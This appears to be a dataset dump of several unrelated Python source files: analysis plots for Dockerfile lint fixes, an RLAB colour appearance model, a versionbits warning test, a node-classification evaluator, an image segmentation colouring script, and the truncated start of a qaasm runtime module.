d8b1bd911fa810ce08e9719c9988e5a765b0128b
|
[
"Apache-2.0"
] | null | null | null |
import os
import pickle
import latextable as latextable
import matplotlib.pyplot as plt
import pandas as pd
from texttable import Texttable
from dfp_main import PatchStats
# Hard-coded sample data for debugging the plots without loading a results
# pickle: patch-position -> count.
DEBUG_POS_DICT = {217: 9, 0: 240, 11: 3, 238: 6, 225: 16, 1: 51, 2: 13, 41: 2, 44: 2, 86: 3, 6: 3, 87: 5, 4: 21, 26: 5,
                  39: 3,
                  28: 1, 5: 15, 10: 5, 113: 2, 62: 2, 50: 3, 216: 3, 12: 5, 218: 3, 24: 8, 20: 4, 83: 2, 72: 3, 15: 2,
                  23: 2,
                  134: 6, 22: 3, 105: 3, 19: 3, 154: 1, 8: 6, 75: 1, 219: 3, 52: 4, 76: 3, 33: 8, 158: 4, 137: 4, 34: 2,
                  7: 13, 79: 2, 3: 2, 48: 6, 160: 1, 40: 1, 84: 6, 211: 8, 159: 1, 69: 3, 90: 4, 118: 4, 16: 2, 17: 1,
                  133: 2}
# Hard-coded sample data for debugging: hadolint/shellcheck rule -> count.
DEBUG_RULE_DICT = {'DL3008': 71, 'DL3009': 33, 'DL3015': 71, 'DL4000': 60, 'DL3005': 9, 'SC2086': 3, 'DL4006': 20,
                   'DL3020': 62, 'DL3007': 6, 'DL3013': 25, 'DL3042': 31, 'SC2028': 1, 'DL3003': 39, 'DL4001': 7,
                   'DL3025': 16, 'DL4003': 2, 'DL3006': 17, 'DL3010': 6, 'DL3032': 8, 'DL3033': 7, 'DL3004': 7,
                   'DL3001': 1,
                   'DL3018': 7, 'SC2155': 1, 'SC2164': 5, 'DL3028': 2, 'DL3014': 3, 'SC2039': 1, 'SC1073': 1,
                   'SC1009': 1,
                   'SC1132': 1, 'SC1072': 1, 'SC2046': 2, 'DL3002': 1, 'DL3019': 2, 'SC2016': 12, 'DL3016': 1,
                   'DL3000': 2,
                   'SC2174': 2, 'SC2006': 2}
def plotRules(rules: dict[str, int], title: str):
    """Bar-plot rule frequencies in descending order (also printed)."""
    print(f"plotRules ({title}): ")
    ranked = sorted(rules.items(), key=lambda kv: kv[1], reverse=True)
    print(ranked)
    labels, counts = zip(*ranked)
    plt.figure(figsize=(20, 6))
    plt.title(title)
    plt.bar(labels, counts)
    plt.xticks(rotation=45)
    plt.tight_layout()
    plt.show()
    print()
def tablePositions(positions: dict[int, int]):
    """Cumulative top-n summary of patch positions (0-based in input):
    plots the cumulative fraction and prints a text + LaTeX table.
    """
    bins = [1, 5, 10, 25, 50, 100]
    # For each bin, count patches whose 1-based position is <= bin.
    rows = [
        [bin_, sum(count for pos, count in positions.items() if pos + 1 <= bin_)]
        for bin_ in bins
    ]
    rows.append(["All", sum(positions.values())])
    total = rows[-1][1]
    x = bins + [total]
    y = [row[1] / total for row in rows]
    plt.plot(x, y)
    plt.show()
    table = Texttable()
    table.set_deco(Texttable.HEADER | Texttable.VLINES)
    table.set_cols_align(["c", "c"])
    table.add_rows([["Top-n", "Count"], *rows], header=True)
    print(table.draw() + "\n")
    print(latextable.draw_latex(table, caption="An example table.", label="tab:positions") + "\n")
def plotTimes(total_times: list[float], times_per_v: list[float]):
    """Box-plot total runtime and per-violation runtime on twin y-axes,
    printing both medians.
    """
    print("plotTimes")
    fig, ax_total = plt.subplots()
    ax_total.set_title("Execution times")
    ax_total.set_ylabel("total in s")
    box = ax_total.boxplot(total_times, showfliers=False, positions=[1])
    print(f"total median: {box['medians'][0].get_ydata()}")
    ax_per = ax_total.twinx()  # second y-axis for the per-violation scale
    ax_per.set_ylabel("per violation in s")
    box = ax_per.boxplot(times_per_v, showfliers=False, positions=[2])
    print(f"per viol median: {box['medians'][0].get_ydata()}")
    ax_total.set_xticks([1, 2])
    ax_total.set_xticklabels(["Total", "Per violation"])
    plt.show()
    print()
def readTestSetStats() -> dict[str, int]:
    """Scan ``testSet/*.csv`` and return per-rule violation counts.

    Also prints average/min/max/total violation counts per file.
    Fixes: the original divided by zero (and crashed on min/max) when the
    folder contained no csv files; that case now just prints a notice.

    :return: dict mapping rule id (e.g. 'DL3008') to total occurrences.
    """
    from collections import Counter
    print("readTestSet:")
    folder = "testSet"
    rules = Counter()
    num_violations = []
    for file in sorted(os.listdir(folder)):
        if file.endswith(".csv"):
            data = pd.read_csv(f"{folder}/{file}")
            num_violations.append(len(data))
            rules.update(data.rule.tolist())
    if num_violations:
        print(f"Avg number of violations in test set: {sum(num_violations) / len(num_violations)}")
        print(f"Min violations: {min(num_violations)}")
        print(f"Max violations: {max(num_violations)}")
        print(f"Total violations: {sum(num_violations)}")
    else:
        print("No csv files found in test set folder")
    print()
    return dict(rules)
def plotRulesVsTotal(rules: dict[str, int], total: dict[str, int]):
    """Stacked bar chart of the fix rate per rule: for every rule in
    *total*, the percentage that appears in *rules* (fixed) vs the rest.
    """
    print("fixedVsTotal:")
    percents = {
        rule: (rules[rule] / count * 100) if rule in rules else 0
        for rule, count in total.items()
    }
    ranked = sorted(percents.items(), key=lambda kv: kv[1], reverse=True)
    print(f"Sorted rules = {ranked}")
    labels, fixed = zip(*ranked)
    remainder = [100 - val for val in fixed]
    plt.figure(figsize=(20, 6))
    plt.title("Fix rate of rule violations")
    plt.bar(labels, fixed)
    plt.bar(labels, remainder, bottom=fixed, color="r")
    plt.ylabel("Fixed violations (%)")
    plt.xticks(rotation=45)
    plt.tight_layout()
    plt.show()
    print()
if __name__ == "__main__":
results_file = "evalStats_20072021_2023.pkl"
# results_file = "evalStats_28072021_1713.pkl"
with open(results_file, "rb") as f:
results: list[PatchStats] = pickle.load(f)
rule_list_file = results_file.removesuffix(".pkl") + "_rules.txt"
if not os.path.exists(rule_list_file):
with open(rule_list_file, "w") as f:
for r in results:
f.writelines(list(map(lambda it: str(it) + "\n", r.patches)))
f.write("\n")
times = list(map(lambda it: it.time, results))
avg_time = sum(times) / len(times)
times_per_violation = list(map(lambda it: it.time / it.total, results))
avg_time_per_violation = sum(times_per_violation) / len(times_per_violation)
verified_patches = [p for stat in results for p in stat.patches]
position_dist = {}
rule_dist = {}
for p in verified_patches:
if p.position not in position_dist:
position_dist[p.position] = 0
position_dist[p.position] += 1
if p.rule not in rule_dist:
rule_dist[p.rule] = 0
rule_dist[p.rule] += 1
testSet = readTestSetStats()
# plotRules(rule_dist, "Fixed violations")
plotRules(testSet, "Violations in test data set")
plotTimes(times, times_per_violation)
plotRulesVsTotal(rule_dist, testSet)
tablePositions(position_dist)
| 34.460227
| 120
| 0.573949
|
4a10f77632c24b9e4c2bed69bb088098bc5533a9
| 9,311
|
py
|
Python
|
colour/appearance/rlab.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | 1
|
2022-02-12T06:28:15.000Z
|
2022-02-12T06:28:15.000Z
|
colour/appearance/rlab.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
colour/appearance/rlab.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
RLAB Colour Appearance Model
============================
Defines the *RLAB* colour appearance model objects:
- :attr:`colour.VIEWING_CONDITIONS_RLAB`
- :attr:`colour.D_FACTOR_RLAB`
- :class:`colour.CAM_Specification_RLAB`
- :func:`colour.XYZ_to_RLAB`
References
----------
- :cite:`Fairchild1996a` : Fairchild, M. D. (1996). Refinement of the RLAB
color space. Color Research & Application, 21(5), 338-346.
doi:10.1002/(SICI)1520-6378(199610)21:5<338::AID-COL3>3.0.CO;2-Z
- :cite:`Fairchild2013w` : Fairchild, M. D. (2013). The RLAB Model. In Color
Appearance Models (3rd ed., pp. 5563-5824). Wiley. ISBN:B00DAYO8E2
"""
from __future__ import annotations
import numpy as np
from dataclasses import dataclass, field
from colour.algebra import matrix_dot, spow, vector_dot
from colour.appearance.hunt import MATRIX_XYZ_TO_HPE, XYZ_to_rgb
from colour.hints import (
ArrayLike,
FloatingOrArrayLike,
FloatingOrNDArray,
NDArray,
Optional,
)
from colour.utilities import (
CaseInsensitiveMapping,
MixinDataclassArray,
as_float,
as_float_array,
from_range_degrees,
row_as_diagonal,
to_domain_100,
tsplit,
)
__author__ = "Colour Developers"
__copyright__ = "Copyright (C) 2013-2022 - Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"MATRIX_R",
"VIEWING_CONDITIONS_RLAB",
"D_FACTOR_RLAB",
"CAM_ReferenceSpecification_RLAB",
"CAM_Specification_RLAB",
"XYZ_to_RLAB",
]
MATRIX_R: NDArray = np.array(
[
[1.9569, -1.1882, 0.2313],
[0.3612, 0.6388, 0.0000],
[0.0000, 0.0000, 1.0000],
]
)
"""
*RLAB* colour appearance model precomputed helper matrix.
"""
VIEWING_CONDITIONS_RLAB: CaseInsensitiveMapping = CaseInsensitiveMapping(
{"Average": 1 / 2.3, "Dim": 1 / 2.9, "Dark": 1 / 3.5}
)
VIEWING_CONDITIONS_RLAB.__doc__ = """
Reference *RLAB* colour appearance model viewing conditions.
References
----------
:cite:`Fairchild1996a`, :cite:`Fairchild2013w`
"""
D_FACTOR_RLAB: CaseInsensitiveMapping = CaseInsensitiveMapping(
{
"Hard Copy Images": 1,
"Soft Copy Images": 0,
"Projected Transparencies, Dark Room": 0.5,
}
)
D_FACTOR_RLAB.__doc__ = """
*RLAB* colour appearance model *Discounting-the-Illuminant* factor values.
References
----------
:cite:`Fairchild1996a`, :cite:`Fairchild2013w`
Aliases:
- 'hard_cp_img': 'Hard Copy Images'
- 'soft_cp_img': 'Soft Copy Images'
- 'projected_dark': 'Projected Transparencies, Dark Room'
"""
D_FACTOR_RLAB["hard_cp_img"] = D_FACTOR_RLAB["Hard Copy Images"]
D_FACTOR_RLAB["soft_cp_img"] = D_FACTOR_RLAB["Soft Copy Images"]
D_FACTOR_RLAB["projected_dark"] = D_FACTOR_RLAB[
"Projected Transparencies, Dark Room"
]
@dataclass
class CAM_ReferenceSpecification_RLAB(MixinDataclassArray):
    """
    Defines the *RLAB* colour appearance model reference specification.
    This specification has field names consistent with *Fairchild (2013)*
    reference.
    Parameters
    ----------
    LR
        Correlate of *Lightness* :math:`L^R`.
    CR
        Correlate of *achromatic chroma* :math:`C^R`.
    hR
        *Hue* angle :math:`h^R` in degrees.
    sR
        Correlate of *saturation* :math:`s^R`.
    HR
        *Hue* :math:`h` composition :math:`H^R`.
    aR
        Red-green chromatic response :math:`a^R`.
    bR
        Yellow-blue chromatic response :math:`b^R`.
    References
    ----------
    :cite:`Fairchild1996a`, :cite:`Fairchild2013w`
    """
    # All fields default to None via default_factory rather than a plain
    # default — presumably required by MixinDataclassArray's field handling;
    # TODO(review): confirm before simplifying to `= None`.
    LR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    CR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    hR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    sR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    HR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    aR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    bR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
@dataclass
class CAM_Specification_RLAB(MixinDataclassArray):
    """
    Defines the *RLAB* colour appearance model specification.
    This specification has field names consistent with the remaining colour
    appearance models in :mod:`colour.appearance` but diverge from
    *Fairchild (2013)* reference.
    Parameters
    ----------
    J
        Correlate of *Lightness* :math:`L^R`.
    C
        Correlate of *achromatic chroma* :math:`C^R`.
    h
        *Hue* angle :math:`h^R` in degrees.
    s
        Correlate of *saturation* :math:`s^R`.
    HC
        *Hue* :math:`h` composition :math:`H^C`.
    a
        Red-green chromatic response :math:`a^R`.
    b
        Yellow-blue chromatic response :math:`b^R`.
    Notes
    -----
    -   This specification is the one used in the current model implementation.
    References
    ----------
    :cite:`Fairchild1996a`, :cite:`Fairchild2013w`
    """
    # Fields mirror CAM_ReferenceSpecification_RLAB under the generic CAM
    # naming (J, C, h, ...); defaults use default_factory — presumably for
    # MixinDataclassArray compatibility; TODO(review): confirm.
    J: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    C: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    h: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    s: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    HC: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    a: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
    b: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
def XYZ_to_RLAB(
    XYZ: ArrayLike,
    XYZ_n: ArrayLike,
    Y_n: FloatingOrArrayLike,
    sigma: FloatingOrArrayLike = VIEWING_CONDITIONS_RLAB["Average"],
    D: FloatingOrArrayLike = D_FACTOR_RLAB["Hard Copy Images"],
) -> CAM_Specification_RLAB:
    """
    Computes the *RLAB* model color appearance correlates.
    Parameters
    ----------
    XYZ
        *CIE XYZ* tristimulus values of test sample / stimulus.
    XYZ_n
        *CIE XYZ* tristimulus values of reference white.
    Y_n
        Absolute adapting luminance in :math:`cd/m^2`.
    sigma
        Relative luminance of the surround, see
        :attr:`colour.VIEWING_CONDITIONS_RLAB` for reference.
    D
        *Discounting-the-Illuminant* factor normalised to domain [0, 1].
    Returns
    -------
    CAM_Specification_RLAB
        *RLAB* colour appearance model specification.
    Notes
    -----
    +------------+-----------------------+---------------+
    | **Domain** | **Scale - Reference** | **Scale - 1** |
    +============+=======================+===============+
    | ``XYZ``    | [0, 100]              | [0, 1]        |
    +------------+-----------------------+---------------+
    | ``XYZ_n``  | [0, 100]              | [0, 1]        |
    +------------+-----------------------+---------------+
    +------------------------------+-----------------------\
+---------------+
    | **Range**                    | **Scale - Reference** \
| **Scale - 1** |
    +==============================+=======================\
+===============+
    | ``CAM_Specification_RLAB.h`` | [0, 360]              \
| [0, 1]        |
    +------------------------------+-----------------------\
+---------------+
    References
    ----------
    :cite:`Fairchild1996a`, :cite:`Fairchild2013w`
    Examples
    --------
    >>> XYZ = np.array([19.01, 20.00, 21.78])
    >>> XYZ_n = np.array([109.85, 100, 35.58])
    >>> Y_n = 31.83
    >>> sigma = VIEWING_CONDITIONS_RLAB['Average']
    >>> D = D_FACTOR_RLAB['Hard Copy Images']
    >>> XYZ_to_RLAB(XYZ, XYZ_n, Y_n, sigma, D)  # doctest: +ELLIPSIS
    CAM_Specification_RLAB(J=49.8347069..., C=54.8700585..., \
h=286.4860208..., s=1.1010410..., HC=None, a=15.5711021..., \
b=-52.6142956...)
    """
    # Normalise inputs to the reference [0, 100] domain and float arrays.
    XYZ = to_domain_100(XYZ)
    XYZ_n = to_domain_100(XYZ_n)
    Y_n = as_float_array(Y_n)
    D = as_float_array(D)
    sigma = as_float_array(sigma)
    # Converting to cone responses.
    LMS_n = XYZ_to_rgb(XYZ_n)
    # Computing the :math:`A` matrix.
    LMS_l_E = (3 * LMS_n) / np.sum(LMS_n, axis=-1)[..., np.newaxis]
    # Partial-adaptation factors, blended with the D factor below so that
    # D=1 fully discounts the illuminant and D=0 does not.
    LMS_p_L = (1 + spow(Y_n[..., np.newaxis], 1 / 3) + LMS_l_E) / (
        1 + spow(Y_n[..., np.newaxis], 1 / 3) + (1 / LMS_l_E)
    )
    LMS_a_L = (LMS_p_L + D[..., np.newaxis] * (1 - LMS_p_L)) / LMS_n
    # Full adaptation matrix: R * diag(LMS_a_L) * XYZ->HPE.
    M = matrix_dot(
        matrix_dot(MATRIX_R, row_as_diagonal(LMS_a_L)), MATRIX_XYZ_TO_HPE
    )
    XYZ_ref = vector_dot(M, XYZ)
    X_ref, Y_ref, Z_ref = tsplit(XYZ_ref)
    # Computing the correlate of *Lightness* :math:`L^R`.
    LR = 100 * spow(Y_ref, sigma)
    # Computing opponent colour dimensions :math:`a^R` and :math:`b^R`.
    aR = as_float(430 * (spow(X_ref, sigma) - spow(Y_ref, sigma)))
    bR = as_float(170 * (spow(Y_ref, sigma) - spow(Z_ref, sigma)))
    # Computing the *hue* angle :math:`h^R` (wrapped into [0, 360)).
    hR = np.degrees(np.arctan2(bR, aR)) % 360
    # TODO: Implement hue composition computation.
    # Computing the correlate of *chroma* :math:`C^R`.
    CR = np.hypot(aR, bR)
    # Computing the correlate of *saturation* :math:`s^R`.
    # NOTE(review): divides by LR — a pure-black stimulus (LR == 0) would
    # produce a division warning / non-finite value; confirm intended.
    sR = CR / LR
    return CAM_Specification_RLAB(
        LR,
        CR,
        as_float(from_range_degrees(hR)),
        sR,
        None,
        aR,
        bR,
    )
| 29.938907
| 79
| 0.609816
|
4a10f85528fe06884133c6390cdcf87a46743687
| 5,082
|
py
|
Python
|
test/functional/feature_versionbits_warning.py
|
BakedInside/test
|
c411891206e72c0da9c9f7a69a2183703b71a988
|
[
"MIT"
] | null | null | null |
test/functional/feature_versionbits_warning.py
|
BakedInside/test
|
c411891206e72c0da9c9f7a69a2183703b71a988
|
[
"MIT"
] | null | null | null |
test/functional/feature_versionbits_warning.py
|
BakedInside/test
|
c411891206e72c0da9c9f7a69a2183703b71a988
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2016-2019 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test version bits warning system.
Generate chains with block versions that appear to be signalling unknown
soft-forks, and test that warning alerts are generated.
"""
import os
import re
from test_framework.blocktools import create_block, create_coinbase
from test_framework.messages import msg_block
from test_framework.p2p import P2PInterface
from test_framework.test_framework import BeansTestFramework
# Versionbits parameters for regtest, the unknown bit this test signals on,
# and the warning strings/patterns the node is expected to emit.
VB_PERIOD = 144 # versionbits period length for regtest
VB_THRESHOLD = 108 # versionbits activation threshold for regtest
VB_TOP_BITS = 0x20000000
VB_UNKNOWN_BIT = 27 # Choose a bit unassigned to any deployment
VB_UNKNOWN_VERSION = VB_TOP_BITS | (1 << VB_UNKNOWN_BIT)
WARN_UNKNOWN_RULES_ACTIVE = "unknown new rules activated (versionbit {})".format(VB_UNKNOWN_BIT)
VB_PATTERN = re.compile("Warning: unknown new rules activated.*versionbit")
class VersionBitsWarningTest(BeansTestFramework):
    """Check that the node warns about unknown versionbits soft-forks.

    Builds chains whose block versions signal an unassigned versionbit and
    verifies that warnings appear both in get*info() output and in the file
    written by -alertnotify.
    """

    def set_test_params(self):
        # Single node on a fresh regtest chain.
        self.setup_clean_chain = True
        self.num_nodes = 1

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def setup_network(self):
        self.alert_filename = os.path.join(self.options.tmpdir, "alert.txt")
        # Open and close to create zero-length file
        with open(self.alert_filename, 'w', encoding='utf8'):
            pass
        # -alertnotify appends each alert message to the alert file.
        self.extra_args = [["-alertnotify=echo %s >> \"" + self.alert_filename + "\""]]
        self.setup_nodes()

    def send_blocks_with_version(self, peer, numblocks, version):
        """Send numblocks blocks to peer with version set"""
        tip = self.nodes[0].getbestblockhash()
        height = self.nodes[0].getblockcount()
        block_time = self.nodes[0].getblockheader(tip)["time"] + 1
        tip = int(tip, 16)
        for _ in range(numblocks):
            block = create_block(tip, create_coinbase(height + 1), block_time)
            block.nVersion = version
            block.solve()
            peer.send_message(msg_block(block))
            block_time += 1
            height += 1
            tip = block.sha256
        peer.sync_with_ping()

    def versionbits_in_alert_file(self):
        """Test that the versionbits warning has been written to the alert file."""
        # BUGFIX: use a context manager so the handle returned by open() is
        # closed deterministically (the original leaked it).
        with open(self.alert_filename, 'r', encoding='utf8') as f:
            alert_text = f.read()
        return VB_PATTERN.search(alert_text) is not None

    def run_test(self):
        node = self.nodes[0]
        peer = node.add_p2p_connection(P2PInterface())
        node_deterministic_address = node.get_deterministic_priv_key().address
        # Mine one period worth of blocks
        node.generatetoaddress(VB_PERIOD, node_deterministic_address)
        self.log.info("Check that there is no warning if previous VB_BLOCKS have <VB_THRESHOLD blocks with unknown versionbits version.")
        # Build one period of blocks with < VB_THRESHOLD blocks signaling some unknown bit
        self.send_blocks_with_version(peer, VB_THRESHOLD - 1, VB_UNKNOWN_VERSION)
        node.generatetoaddress(VB_PERIOD - VB_THRESHOLD + 1, node_deterministic_address)
        # Check that we're not getting any versionbit-related errors in get*info()
        assert not VB_PATTERN.match(node.getmininginfo()["warnings"])
        assert not VB_PATTERN.match(node.getnetworkinfo()["warnings"])
        # Build one period of blocks with VB_THRESHOLD blocks signaling some unknown bit
        self.send_blocks_with_version(peer, VB_THRESHOLD, VB_UNKNOWN_VERSION)
        node.generatetoaddress(VB_PERIOD - VB_THRESHOLD, node_deterministic_address)
        self.log.info("Check that there is a warning if previous VB_BLOCKS have >=VB_THRESHOLD blocks with unknown versionbits version.")
        # Mine a period worth of expected blocks so the generic block-version warning
        # is cleared. This will move the versionbit state to ACTIVE.
        node.generatetoaddress(VB_PERIOD, node_deterministic_address)
        # Stop-start the node. This is required because beansd will only warn once about unknown versions or unknown rules activating.
        self.restart_node(0)
        # Generating one block guarantees that we'll get out of IBD
        node.generatetoaddress(1, node_deterministic_address)
        self.wait_until(lambda: not node.getblockchaininfo()['initialblockdownload'])
        # Generating one more block will be enough to generate an error.
        node.generatetoaddress(1, node_deterministic_address)
        # Check that get*info() shows the versionbits unknown rules warning
        assert WARN_UNKNOWN_RULES_ACTIVE in node.getmininginfo()["warnings"]
        assert WARN_UNKNOWN_RULES_ACTIVE in node.getnetworkinfo()["warnings"]
        # Check that the alert file shows the versionbits unknown rules warning
        self.wait_until(lambda: self.versionbits_in_alert_file())
# Script entry point: run the functional test when executed directly.
if __name__ == '__main__':
    VersionBitsWarningTest().main()
| 47.495327
| 137
| 0.717631
|
4a10fb9bd780bb1c53eda563a2a601f528b75054
| 3,488
|
py
|
Python
|
gssl/inductive/tasks.py
|
pbielak/graph-barlow-twins
|
f8e20134afed4f17ffcecf8f48764df362ffdcad
|
[
"MIT"
] | 9
|
2021-06-11T13:23:50.000Z
|
2022-03-23T19:45:54.000Z
|
gssl/inductive/tasks.py
|
pbielak/graph-barlow-twins
|
f8e20134afed4f17ffcecf8f48764df362ffdcad
|
[
"MIT"
] | 2
|
2021-09-22T13:58:39.000Z
|
2021-11-23T02:26:50.000Z
|
gssl/inductive/tasks.py
|
pbielak/graph-barlow-twins
|
f8e20134afed4f17ffcecf8f48764df362ffdcad
|
[
"MIT"
] | 2
|
2021-06-10T06:05:47.000Z
|
2021-09-27T15:13:23.000Z
|
from typing import Dict
import numpy as np
from sklearn import metrics as sk_mtr
from sklearn import preprocessing as sk_prep
import torch
from torch import nn
from tqdm import tqdm
def evaluate_node_classification(
    z_train: torch.Tensor,
    y_train: torch.Tensor,
    z_val: torch.Tensor,
    y_val: torch.Tensor,
    z_test: torch.Tensor,
    y_test: torch.Tensor,
) -> Dict[str, float]:
    """Probe embeddings with a logistic-regression classifier.

    Standardises each split's embeddings, sweeps a log-spaced weight-decay
    grid, keeps the classifier with the best micro-F1 on the validation
    split, and returns the micro-F1 of that classifier on all three splits.
    """
    # Standardise each split independently (fit on the split itself).
    z_train = sk_prep.StandardScaler().fit_transform(X=z_train)
    z_val = sk_prep.StandardScaler().fit_transform(X=z_val)
    z_test = sk_prep.StandardScaler().fit_transform(X=z_test)
    emb_dim = z_train.shape[1]
    num_cls = y_train.size(1)
    # Sweep weight decays 2^-10, 2^-8, ..., 2^8 and keep the best on val F1.
    candidate_wds = 2.0 ** np.arange(-10, 10, 2)
    best_model = None
    best_score = -1
    progress = tqdm(candidate_wds, desc="Train best classifier")
    for weight_decay in progress:
        candidate = LogisticRegression(emb_dim, num_cls, weight_decay=weight_decay)
        candidate.fit(z_train, y_train.numpy())
        score = sk_mtr.f1_score(
            y_true=y_val,
            y_pred=candidate.predict(z_val),
            average="micro",
            zero_division=0,
        )
        if score > best_score:
            best_score, best_model = score, candidate
        progress.set_description(f"Best F1: {best_score * 100.0:.2f}")
    progress.close()
    # Score the selected classifier on every split.
    splits = {
        "train": (z_train, y_train),
        "val": (z_val, y_val),
        "test": (z_test, y_test),
    }
    return {
        split: sk_mtr.f1_score(
            y_true=labels,
            y_pred=best_model.predict(features),
            average="micro",
            zero_division=0,
        )
        for split, (features, labels) in splits.items()
    }
class LogisticRegression(nn.Module):
    """Multi-label logistic-regression probe.

    A single linear layer trained with AdamW and BCE-with-logits for a fixed
    number of epochs; predictions threshold the logits at zero.
    """

    def __init__(self, in_dim: int, out_dim: int, weight_decay: float):
        super().__init__()
        # One affine layer; multi-label outputs, thresholded in `predict`.
        self.fc = nn.Linear(in_dim, out_dim)
        self._optimizer = torch.optim.AdamW(
            params=self.parameters(),
            lr=0.01,
            weight_decay=weight_decay,
        )
        self._loss_fn = nn.BCEWithLogitsLoss()
        self._num_epochs = 1000
        self._device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        # Re-initialise every submodule, then move the model to the device.
        for module in self.modules():
            self.weights_init(module)
        self.to(self._device)

    def weights_init(self, m):
        # Xavier-uniform weights and zero bias for linear layers only.
        if not isinstance(m, nn.Linear):
            return
        torch.nn.init.xavier_uniform_(m.weight.data)
        if m.bias is not None:
            m.bias.data.fill_(0.0)

    def forward(self, x):
        # Raw logits; no activation (BCEWithLogitsLoss applies the sigmoid).
        return self.fc(x)

    def fit(self, X: np.ndarray, y: np.ndarray):
        """Train on the full batch for the configured number of epochs."""
        self.train()
        features = torch.from_numpy(X).float().to(self._device)
        targets = torch.from_numpy(y).to(self._device)
        for _ in tqdm(range(self._num_epochs), desc="Epochs", leave=False):
            self._optimizer.zero_grad()
            logits = self(features)
            self._loss_fn(input=logits, target=targets).backward()
            self._optimizer.step()

    def predict(self, X: np.ndarray):
        """Return a float {0, 1} tensor on CPU: 1 where the logit is > 0."""
        self.eval()
        with torch.no_grad():
            logits = self(torch.from_numpy(X).float().to(self._device))
        return (logits > 0).float().cpu()
| 26.029851
| 75
| 0.583716
|
4a10fbbcc5929e00e82a9a37d8fec907205a72a5
| 869
|
py
|
Python
|
src/segmentation/img/reconstruir.py
|
mmaximiliano/algo3-project2
|
bad8f7704f8d004c1e21ba684e98890578bf8ccc
|
[
"MIT"
] | null | null | null |
src/segmentation/img/reconstruir.py
|
mmaximiliano/algo3-project2
|
bad8f7704f8d004c1e21ba684e98890578bf8ccc
|
[
"MIT"
] | null | null | null |
src/segmentation/img/reconstruir.py
|
mmaximiliano/algo3-project2
|
bad8f7704f8d004c1e21ba684e98890578bf8ccc
|
[
"MIT"
] | null | null | null |
from PIL import Image
from PIL import ImageOps
import numpy as np
import random as rand
import os
def main():
    """Colour a segmentation matrix and save it as a bitmap.

    Reads a path prefix from stdin, loads "<ruta>.txt" (an integer matrix in
    which each cell holds a connected-component label), maps every label to a
    random RGB colour (the colour table is generated once and cached in
    "colores.txt"), and writes the coloured image to
    "resultados/<ruta>_seg.bmp".
    """
    ruta = input()
    componentes = np.loadtxt(ruta + ".txt", dtype=int)
    height = componentes.shape[0]
    width = componentes.shape[1]
    if not os.path.isfile('colores.txt'):
        print("Generando colores...")
        # BUGFIX: use a context manager so the colour table is flushed and
        # closed before it is re-read below — the original left the write
        # handle open, so the reader could see a truncated file.
        with open("colores.txt", "w") as f:
            for _ in range(0, 1920):
                for _ in range(0, 1920):
                    f.write(str(rand.randint(0, 255)) + ", " + str(rand.randint(0, 255)) + ", " + str(rand.randint(0, 255)) + ", 255 \n")
    # One (R, G, B, A) tuple per line; component label i gets colores[i].
    with open('colores.txt') as f:
        colores = [tuple(map(int, i.split(','))) for i in f]
    img = Image.new('RGB', componentes.shape)
    segmentada = img.load()
    for i in range(0, height):
        for j in range(0, width):
            segmentada[i, j] = colores[componentes[i, j]]
    # The matrix was written row-major; rotate + mirror restores orientation.
    img = img.rotate(270, expand=True)
    img = ImageOps.mirror(img)
    img.save("resultados/" + ruta + "_seg.bmp")


if __name__ == "__main__":
    main()
| 23.486486
| 107
| 0.675489
|
4a10fc842770c44ebb6cd67b1f620920fc5e5308
| 12,372
|
py
|
Python
|
pyblq/old/runtime.py
|
patrickrall/pyblq
|
593e678ff7ca5dc77ffcc1f0636ef41762c65e60
|
[
"MIT"
] | null | null | null |
pyblq/old/runtime.py
|
patrickrall/pyblq
|
593e678ff7ca5dc77ffcc1f0636ef41762c65e60
|
[
"MIT"
] | null | null | null |
pyblq/old/runtime.py
|
patrickrall/pyblq
|
593e678ff7ca5dc77ffcc1f0636ef41762c65e60
|
[
"MIT"
] | null | null | null |
from .qaasm import *
# returns qaasm_expn. Evaluates as much as possible.
# perhaps need to wrap the thing to keep track of dependent registers
# and also deal with arrays
# alternative: realize that a qaasm expn can only ever end up in a qaasm increment instruction.
# the wrapper could be a list of instructions itself.
# {"expn":<qaasm_expn>, "depends":[<reg>,<reg>,<reg>],
# "arrays":[{"target":<reg>, "key":<reg>, "regs":[<reg>,<reg>]}] }
# returns expn, depends, arrays
def process_qaasm_expn(ast):
    """Lower an expression AST node into a qaasm expression.

    Returns a 3-tuple ``(expn, depends, arrays)``:

    * ``expn``    -- the qaasm expression dict,
    * ``depends`` -- the registers the expression reads (no duplicates),
    * ``arrays``  -- array accesses, each of the form
      ``{"target": <reg>, "key": <reg>, "regs": [<reg>, ...]}``.

    Constant folding: any sub-expression whose operands are all known values
    collapses to a single ``{"kind": "value_expn", ...}`` node.

    NOTE(review): ``kwargs``, ``scope``, ``args``, ``at`` and ``error_at`` are
    free names not defined in this module as shown -- presumably supplied by
    an enclosing scope in the original design; confirm before reuse.
    """
    if ast["kind"] == "symbol_expression":
        name = ast["identifier"]["value"]
        if name in kwargs:
